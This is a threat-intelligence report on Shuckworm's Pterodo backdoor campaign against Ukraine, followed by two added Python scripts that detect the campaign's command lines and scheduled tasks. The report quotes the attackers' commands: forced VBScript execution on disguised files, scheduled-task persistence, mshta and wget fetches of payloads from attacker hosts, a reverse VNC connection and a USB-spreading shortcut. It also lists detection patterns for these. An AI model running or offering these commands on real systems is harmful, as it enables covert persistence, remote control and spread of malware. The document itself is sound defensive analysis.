Shuckworm Continues Cyber-Espionage Attacks Against Ukraine

At 08:48 (local time), a suspicious Word document is opened on the machine.
Just five minutes after the document is opened, a suspicious command is executed to launch a malicious VBS file (depended.lnk). This file is a known custom backdoor, Pterodo, used by Shuckworm. Note that the script carries a .lnk extension: it is run only because the command forces the VBScript engine on it with //e:VBScript, and //b (batch mode) suppresses any script errors or prompts that would otherwise alert the user.

wscript.exe CSIDL_PROFILE\searches\depended.lnk //e:VBScript //b
The backdoor is used to download and execute CSIDL_PROFILE\searches\depended.exe (94a78d5dce553832d61b59e0dda9ef2c33c10634ba4af3acb7fb7cf43be17a5b) from hxxp://92.242.62.131/wordpress.php?is=[REDACTED].

Two additional VBS scripts are observed being executed via depended.exe:

"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\roaming\reflect.rar //e:VBScript //b
"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\deep-thoughted. //e:VBScript //b
A scheduled task is then created, most likely to ensure persistence across reboots, to execute the dropped script. The task runs the VBS file deep-thoughted.ppt every 10 minutes:

SCHTASKS /CREATE /sc minute /mo 10 /tn "deep-thoughted" /tr "wscript.exe " CSIDL_COMMON_PICTURES\deep-thoughted.ppt //e:VBScript //b" /F
Later, the attackers are observed using depended.exe to spawn cmd.exe, which launches mshta.exe against an HTA file hosted on a remote server. Mshta is a signed Windows utility that executes Microsoft HTML Application (HTA) files, and it is commonly abused to bypass application control solutions. Because mshta.exe executes outside of Internet Explorer's security context, the browser's security settings do not apply to the HTA it runs.

"CSIDL_SYSTEM\cmd.exe" /c CSIDL_SYSTEM\mshta.exe hxxp://fiordan.ru/FILM.html /f id=[REDACTED]
At the same time, a new variant of Pterodo is installed via depended.exe.

As before, two additional scheduled tasks are created:

"CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe " CSIDL_COMMON_MUSIC\tvplaylist.mov //e:VBScript //b " /F"
"CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "VideoHostName" /tr "wscript.exe " CSIDL_COMMON_VIDEO\webmedia.m3u //e:VBScript //b " /F"
The attackers continue to install variants of their backdoor and execute commands via scripts to ensure persistence:

"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\22333.docx //e:VBScript //b
"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\9140.d //e:VBScript //b
wscript.exe CSIDL_COMMON_MUSIC\tvplaylist.mov //e:VBScript //b
schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr "wscript.exe C:\Users\o.korol\AppData\Roaming\battery\battery.dat //e:VBScript //b"
"CSIDL_SYSTEM\cmd.exe" /c CSIDL_PROFILE\appdata\roaming\battery\battery.cmd
Directly after this, the attackers appear to test connectivity to a new C&C server with ping.exe:

CSIDL_SYSTEM\cmd.exe /c ping -n 1 arianat.ru
Once the connection is confirmed to be active, the attackers proceed to download another variant of their Pterodo backdoor and begin using the new C&C to download additional scripts and tools, as well as creating scheduled tasks to run every few minutes.

"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\12382. //e:VBScript //b
"CSIDL_SYSTEM\cmd.exe" /c CSIDL_SYSTEM\mshta.exe hxxp://avirona.ru/7-ZIP.html /f id=
CSIDL_SYSTEM\mshta.exe hxxp://avirona.ru/7-ZIP.html /f id=
"CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe " CSIDL_COMMON_MUSIC\mediatv.mov //e:VBScript //b " /F"
"CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "VideoHostName" /tr "wscript.exe " CSIDL_COMMON_VIDEO\videotv.m3u //e:VBScript //b " /F"
At this point, the attackers cease activity. However, analysts continue to see commands being executed from the scheduled tasks for the remainder of July 14.

The attackers then return, and several additional variants of Pterodo are executed via CSIDL_COMMON_VIDEO\planeta.exe (1ea3881d5d03214d6b7e37fb7b10221ef51782080a24cc3e275f42a3c1ea99c1).

"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\32440.docx //e:VBScript //b
"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\20507.d //e:VBScript //b
The attackers are then observed executing commands via planeta.exe:

CSIDL_SYSTEM\cmd.exe /c ""CSIDL_PROFILE\appdata\local\temp\7zsfx000."" ""
"CSIDL_SYSTEM\cmd.exe" /c ipconfig /flushdns
The flushdns command may indicate that the attackers had updated the DNS records for their C&C servers, as some of their tools were observed using hard-coded domains; clearing the local resolver cache forces the next lookup to fetch the new record rather than a stale one. In this instance, the flushdns command was executed shortly before the attackers attempted to install additional backdoors that used the same C&C.

Later, another variant of Pterodo (deep-sided.fly) was executed and used to download and execute a new file, deerskin.exe (ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29). This file is a dropper for a VNC client. When executed, it pings Google's public DNS resolver (8.8.8.8) to test internet connectivity, then drops the VNC client and establishes a connection to a remote C&C server controlled by the attackers:

"%USERPROFILE%\Contacts\DriversHood.exe" -autoreconnect -id:2097 -connect mucoris.ru:5612
Two such files have been identified that perform the same actions:

1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f
ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29
This VNC client appears to be the ultimate payload for this attack.
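The command lines quoted throughout this incident share a small set of tells: a script host forced to run VBScript from a file with a non-script extension (//e:VBScript //b on .lnk, .ppt, .rar, .mov, .m3u, .dat or a bare trailing dot), schtasks entries that re-run such a script every 10 to 15 minutes, mshta.exe given a remote URL, and a VNC client dialling an external repeater. The following is an added example, not code from the report or from Symantec, that turns those tells into a triage function and runs it over a handful of sample lines constructed from the report's own observations (CSIDL_* placeholders and defanged hxxp:// URLs kept as they appear) plus two constructed benign lines; the 30-minute interval threshold is an assumption chosen for illustration.

```python
"""Triage Windows process command lines for the Shuckworm living-off-the-land chain.

Added example; not code from the report. SAMPLE_COMMAND_LINES are constructed
from the command lines quoted in the report plus two benign controls; none of
it is real telemetry.
"""
import ntpath
import re

SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
MAX_INTERVAL_MINUTES = 30  # assumption: a script host re-run this often is worth a look

# First argument after the script host, whether or not the host path is quoted.
SCRIPT_HOST_ARG = re.compile(r'(?:wscript|cscript)\.exe["\s]+([^"\s]+)', re.I)
ENGINE_OVERRIDE = re.compile(r'//e:(vbscript|jscript)\b', re.I)
BATCH_MODE = re.compile(r'(?:^|\s)//b(?=\s|"|$)', re.I)
TASK_CREATE = re.compile(r'/create\b.*?/sc\s+minute\b.*?/mo\s+(\d+)', re.I | re.S)
MSHTA_REMOTE = re.compile(r'mshta\.exe.*?\bh(?:tt|xx)ps?://([^\s/"]+)', re.I)
VNC_REPEATER = re.compile(r'-autoreconnect\b.*?-connect\s+([^\s"]+)', re.I)

SAMPLE_COMMAND_LINES = [
    # constructed from the report's observations; not real log data
    r'wscript.exe CSIDL_PROFILE\searches\depended.lnk //e:VBScript //b',
    r'"CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\deep-thoughted. //e:VBScript //b',
    r'SCHTASKS /CREATE /sc minute /mo 10 /tn "deep-thoughted" /tr "wscript.exe " CSIDL_COMMON_PICTURES\deep-thoughted.ppt //e:VBScript //b" /F',
    r'"CSIDL_SYSTEM\cmd.exe" /c CSIDL_SYSTEM\mshta.exe hxxp://fiordan.ru/FILM.html /f id=[REDACTED]',
    r'"%USERPROFILE%\Contacts\DriversHood.exe" -autoreconnect -id:2097 -connect mucoris.ru:5612',
    # constructed benign controls: a real .vbs logon script and a daily task
    r'wscript.exe \\fileserver\netlogon\map_drives.vbs',
    r'schtasks /Create /SC DAILY /ST 09:00 /tn "Backup" /tr "C:\Tools\backup.exe" /F',
]


def triage(cmdline: str) -> list[str]:
    """Return the reasons a command line matches this tradecraft (empty list = nothing seen)."""
    reasons = []
    host_arg = SCRIPT_HOST_ARG.search(cmdline)
    engine = ENGINE_OVERRIDE.search(cmdline)
    if host_arg and engine:
        target = host_arg.group(1)
        ext = ntpath.splitext(target)[1].lower()  # ntpath handles backslash paths on any host
        if ext not in SCRIPT_EXTENSIONS:
            # .lnk/.ppt/.rar/.mov/.dat or a bare trailing dot: only the engine switch makes it run
            reasons.append(f"{engine.group(1).upper()} forced on non-script file {target!r} (ext {ext!r})")
        if BATCH_MODE.search(cmdline):
            reasons.append("//b batch mode hides script errors and prompts from the user")
    task = TASK_CREATE.search(cmdline)
    if task:
        minutes = int(task.group(1))
        if minutes <= MAX_INTERVAL_MINUTES and (host_arg or "mshta" in cmdline.lower()):
            reasons.append(f"scheduled task re-runs a script host every {minutes} min")
    remote = MSHTA_REMOTE.search(cmdline)
    if remote:
        reasons.append(f"mshta.exe executing remote HTA from {remote.group(1)}")
    vnc = VNC_REPEATER.search(cmdline)
    if vnc:
        reasons.append(f"VNC client dialling out to repeater {vnc.group(1)}")
    return reasons


def run_triage(cmdlines):
    """Map each flagged command line to its reasons; clean lines are omitted."""
    return {line: hits for line in cmdlines if (hits := triage(line))}


if __name__ == "__main__":
    for line, hits in run_triage(SAMPLE_COMMAND_LINES).items():
        print(line)
        for hit in hits:
            print("   -", hit)
```

The same checks apply unchanged to Sysmon event 1 or Windows 4688 command-line fields; the point of keying on the engine override rather than on file names is that Shuckworm rotates the names (deep-thoughted, tvplaylist, webmedia, battery) far more often than the wscript.exe //e:VBScript //b pattern itself.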

During the course of this incident, specifically after the VNC client was installed, a number of documents were opened from various locations on the compromised machine. It is unclear whether this was legitimate user activity or the attackers collecting sensitive information for exfiltration. The titles of the documents accessed ranged from job descriptions to sensitive information about the targeted organization.

Thorough investigation uncovered a total of seven files used by Shuckworm in recent attacks.
All seven are 7-Zip SFX (self-extracting) binaries, a format used previously in Shuckworm attacks.

descend.exe

Upon execution, descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) drops a VBS file which, in turn, drops a second VBS file in the following locations:

%USERPROFILE%\Downloads\deerbrook.ppt
%PUBLIC%\Pictures\deerbrook.ppt
It then creates the following task:

SCHTASKS /CREATE /sc minute /mo 11 /tn "deerbrook" /tr "wscript.exe 'deerbrook.ppt' //e:VBScript //b" /F
The deerbrook.ppt VBS file (b46e872375b3c910fb589ab75bf130f7e276c4bcd913705a140ac76d9d373c9e) contacts a command-and-control (C&C) server at deep-pitched.enarto.ru. If the C&C server is available, an HTTP POST request is sent to download a payload, which is saved in the %USERPROFILE% folder as deep-sunken.tmp, renamed to deep-sunken.exe and executed. The binary is then deleted.

deep-sunken.exe

Upon execution, the file deep-sunken.exe (02c41bddd087522ce60f9376e499dcee6259853dcb50ddad70cb3ef8dd77c200) drops the following files on the compromised computer:

%APPDATA%\baby\baby.cmd
%APPDATA%\baby\baby.dat
%APPDATA%\baby\basement.exe (wget binary)
%APPDATA%\baby\vb_baby.vbs
It then creates the following task:

schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr "wscript.exe [%APPDATA%]\baby\baby.dat" //e:VBScript //b
It then connects to a C&C server (arianat.ru) to download another payload using wget:

basement.exe --user-agent="Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64::[VICTIM_ID]::/.beagle/." -q -b -c -t 2 "hxxp://arianat.ru/baby.php" -P "[%APPDATA%]\baby"
The baby.dat file is a VBS file that executes baby.cmd, which then downloads and executes the payload from the C&C server.

The vb_baby.vbs file renames the downloaded payload from baby.php to backed.exe.

The downloaded payload (backed.exe) could not be retrieved. However, the following files were also obtained during investigation:

z4z05jn4.egf.exe

The file z4z05jn4.egf.exe (fd9a9dd9c73088d1ffdea85540ee671d8abb6b5ab37d66a760b2350951c784d0) is similar to the previous file (deep-sunken.exe) but with different folders, file names, and C&C server (iruto.ru).

defiant.exe

Once executed, the file defiant.exe (a20e38bacc979a5aa18f1954df1a2c0558ba23cdc1503af0ad1021c330f1e455) drops a VBS file in the following locations:

%TEMP%\deep-versed.nls
%PUBLIC%\Pictures\deep-versed.nls
It then creates the following task:

SCHTASKS /CREATE /sc minute /mo 12 /tn "deep-versed" /tr "wscript.exe "[%PUBLIC%]\Pictures\deep-versed.nls" //e:VBScript //b" /F
The dropped file deep-versed.nls (817901df616c77dd1e5694e3d75aebb3a52464c23a06820517108c74edd07fbc) downloads a payload from a C&C server (deep-toned.chehalo.ru) and saves it as deep-green.exe in the following location:

%PUBLIC%\Downloads
deep-green.exe

The file deep-green.exe (1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f) contains an UltraVNC binary which, upon execution, connects to a repeater (mucoris.ru:5612) using the following command line:

-autoreconnect -id:%RANDOM% -connect mucoris.ru:5612
UltraVNC is an open-source remote-administration (remote desktop) utility. Used in this repeater mode, the compromised host makes an outbound connection to the attackers' relay and identifies itself by the -id value, so no inbound port needs to be reachable on the victim and the traffic looks like an ordinary outgoing TCP session to port 5612.

deep-green.exe

A second file named deep-green.exe (f6c56a51c1f0139036e80a517a6634d4d87d05cce17c4ca5adc1055b42bf03aa) contains a Process Explorer (procexp) binary.

Process Explorer is a freeware task manager and system monitor for Microsoft Windows.

deep-green.exe

A third file called deep-green.exe (de5a53a3b75e3e730755af09e3cacb7e6d171fc9b1853a7200e5dfb9044ab20a) is similar to descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) just with different file names and C&C server (deer-lick.chehalo.ru).

deep-green.exe

The fourth and final file named deep-green.exe (d15a7e69769f4727f7b522995a17a0206ac9450cfb0dfe1fc98fd32272ee5ba7) drops a VBS file in the following location:

%PUBLIC%\Music
It then creates the following task:

"/CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe "C:\Users\Public\Music\MediaConvertor.dat" //e:VBScript //b " /F"
The MediaConvertor.dat file searches for removable drives and creates a .lnk file on them that runs the following command, giving the implant a path onto other machines the drive is plugged into:

mshta.exe hxxp://PLAZMA.VIBER.ontroma.ru/PLAZMA.html /f id=January
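Every sample in this set persists the same way: a scheduled task that re-runs wscript.exe with //e:VBScript against a file whose extension says .ppt, .dat or .nls. Where process command-line logging was not in place at the time, the tasks themselves are still on disk, one XML file per task under %SystemRoot%\System32\Tasks. The following is an added example, not code from the report or from Symantec, that audits such task documents for a short repetition interval combined with a script-host action. The two documents in it are constructed to match the layout schtasks /Create /SC MINUTE /MO 12 produces (Task Scheduler schema namespace, a TimeTrigger with an ISO 8601 Repetition Interval) and a benign daily task; they are not files recovered from a victim, and the 30-minute threshold is an assumption.

```python
"""Audit Task Scheduler XML for minute-interval script-host persistence.

Added example; not code from the report. The XML below is constructed, and
its XML declaration (real files are UTF-16) is omitted so the string parses
directly; ET.parse() handles the encoding when reading real files.
"""
import ntpath
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}
MAX_INTERVAL_MINUTES = 30  # assumption: repeating this often through a script host merits review
DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")

# Constructed sample modelled on the MediaConverter task described above.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT12M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2023-01-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>wscript.exe</Command>
    <Arguments>"C:\Users\Public\Music\MediaConvertor.dat" //e:VBScript //b</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed benign control: a daily maintenance script with a real .vbs extension.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2023-01-01T09:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\wscript.exe</Command>
    <Arguments>C:\Scripts\cleanup.vbs</Arguments>
  </Exec></Actions>
</Task>"""


def duration_minutes(iso: str) -> float:
    """Convert an ISO 8601 duration such as PT12M or PT1H30M to minutes."""
    m = DURATION.match(iso.strip())
    if not m:
        raise ValueError(f"unsupported duration {iso!r}")
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + minutes + seconds / 60


def first_argument(args: str) -> str:
    """The script path from an Arguments element, honouring a leading quoted token."""
    args = args.lstrip()
    if args.startswith('"'):
        return args[1:].split('"', 1)[0]
    return args.split(None, 1)[0] if args else ""


def audit_task(root: ET.Element) -> list[str]:
    """Return findings for one parsed task document (empty list = nothing suspicious)."""
    intervals = [duration_minutes(e.text) for e in root.iterfind(".//t:Repetition/t:Interval", NS) if e.text]
    shortest = min(intervals) if intervals else None
    findings = []
    for exec_el in root.iterfind(".//t:Actions/t:Exec", NS):
        command = exec_el.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exec_el.findtext("t:Arguments", default="", namespaces=NS).strip()
        exe = ntpath.basename(command).lower()
        if exe not in SCRIPT_HOSTS:
            continue
        if shortest is not None and shortest <= MAX_INTERVAL_MINUTES:
            findings.append(f"{exe} repeats every {shortest:g} min: {args}")
        target = first_argument(args)
        if re.search(r"//e:", args, re.I) and ntpath.splitext(target)[1].lower() not in SCRIPT_EXTENSIONS:
            findings.append(f"engine override on non-script file {target!r}")
    return findings


def audit_task_text(xml_text: str) -> list[str]:
    return audit_task(ET.fromstring(xml_text))


def audit_tasks_folder(folder=r"C:\Windows\System32\Tasks") -> dict:
    """Walk a live or exported Tasks folder and collect findings per task file."""
    report = {}
    for dirpath, _, names in os.walk(folder):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                hits = audit_task(ET.parse(path).getroot())
            except (ET.ParseError, OSError, ValueError):
                continue  # not a task document, unreadable, or an interval form we do not model
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    print(audit_task_text(SAMPLE_TASK_XML))
    print(audit_task_text(BENIGN_TASK_XML))
```

Run audit_tasks_folder against the live Tasks directory (administrator rights needed) or against a copy pulled by a forensic collector; the Repetition interval and the Exec action are the two fields worth exporting alongside the task name, since the names Shuckworm picks (MediaConverter, VideoHostName, BackgroundConfigSurveyor) are chosen to blend in.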
